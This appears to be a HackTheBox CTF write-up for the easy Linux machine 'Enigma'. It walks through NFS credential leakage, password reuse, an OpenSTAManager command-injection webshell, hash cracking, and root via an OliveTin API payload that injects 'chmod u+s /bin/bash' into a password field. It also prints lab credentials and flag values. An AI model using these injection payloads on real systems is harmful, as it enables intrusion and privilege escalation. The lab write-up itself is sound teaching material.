Back to writeups
HTBmachineEasysolved

Enigma

12 Jul 2026 · by 0xIDA

Solvers

Enigma

Author: 0xIDA
Platform: HTB · Category: machine · Difficulty: Easy

Solvers

Summary

Easy Linux box. NFS share leaks webmail creds → Roundcube as kevin/sarah → OpenSTAManager admin password in sarah’s mail → CVE-2025-69212 P7M command injection as www-data → crack OSM user hash for haris → SSH key + local OliveTin → command injection in Backup Database action as root.

Recon

22/tcp   OpenSSH 9.6p1 Ubuntu
80/tcp   nginx → enigma.htb
110/143/993/995  Dovecot (IMAP/POP3)
111/2049 NFS

NFS export:

/srv/nfs/onboarding *

User

NFS → credentials

Mount and extract PDF:

mount -t nfs 10.129.239.191:/srv/nfs/onboarding /mnt
pdftotext New_Employee_Access.pdf -

Yields:

  • Webmail: http://mail001.enigma.htb
  • User: kevin / Enigma2024!

Roundcube → OpenSTAManager

Login IMAP as kevin (and password reuse as sarah with same password). Sarah’s inbox (from it@enigma.htb):

URL: http://support_001.enigma.htb
Username: admin
Password: Ne3s4rtars78s

OpenSTAManager 2.9.8 RCE (CVE-2025-69212)

Authenticated OS command injection in decodeP7M() via malicious .p7m filename inside ZIP upload (import FE / receipt plugins). Deploy webshell:

http://support_001.enigma.htb/files/SHELL.php?c=id
# uid=33(www-data)

DB creds in config.inc.php: brollin / Fri3nds@9099 / openstamanager.

zz_users bcrypt:

  • adminNe3s4rtars78s
  • harisbestfriends (rockyou)

As www-data:

echo bestfriends | su - haris -c 'cat ~/user.txt'
# 42cbe15749b1797c48ec5f79a1669df0

Install SSH key for haris (SSH is pubkey-only).

Root

OliveTin (127.0.0.1:1337)

Runs as root. Guest can execute actions (authRequireGuestsToLogin: false). Custom action:

- title: Backup Database
  id: backup_database
  shell: "mysqldump -u {{ db_user }} -p'{{ db_pass }}' {{ db_name }} > /opt/backups/backup.sql"
  arguments:
    - name: db_pass
      type: password   # not sanitized

Command injection via db_pass:

curl -X POST http://127.0.0.1:1337/api/StartAction \
  -H 'Content-Type: application/json' \
  -d '{"bindingId":"backup_database","arguments":[
    {"name":"db_user","value":"backup_svc"},
    {"name":"db_pass","value":"x'\'' ; chmod u+s /bin/bash; id > /tmp/root_pwned; #"},
    {"name":"db_name","value":"production"}
  ]}'
/bin/bash -p -c 'cat /root/root.txt'
# b14b0d4d3173ca0a62e60d557135db53

Note: php-fpm (www-data) could not connect to OliveTin (hung/timeout); haris user could.

Flags

TypeValue
User42cbe15749b1797c48ec5f79a1669df0
Rootb14b0d4d3173ca0a62e60d557135db53

Tools / Commands

  • nmap, showmount, mount.nfs, pdftotext
  • Roundcube / IMAP (kevin, sarah) + password reuse
  • OpenSTAManager CVE-2025-69212 exploit (P7M/ZIP)
  • john + rockyou → haris:bestfriends
  • SSH key install + OliveTin API StartAction injection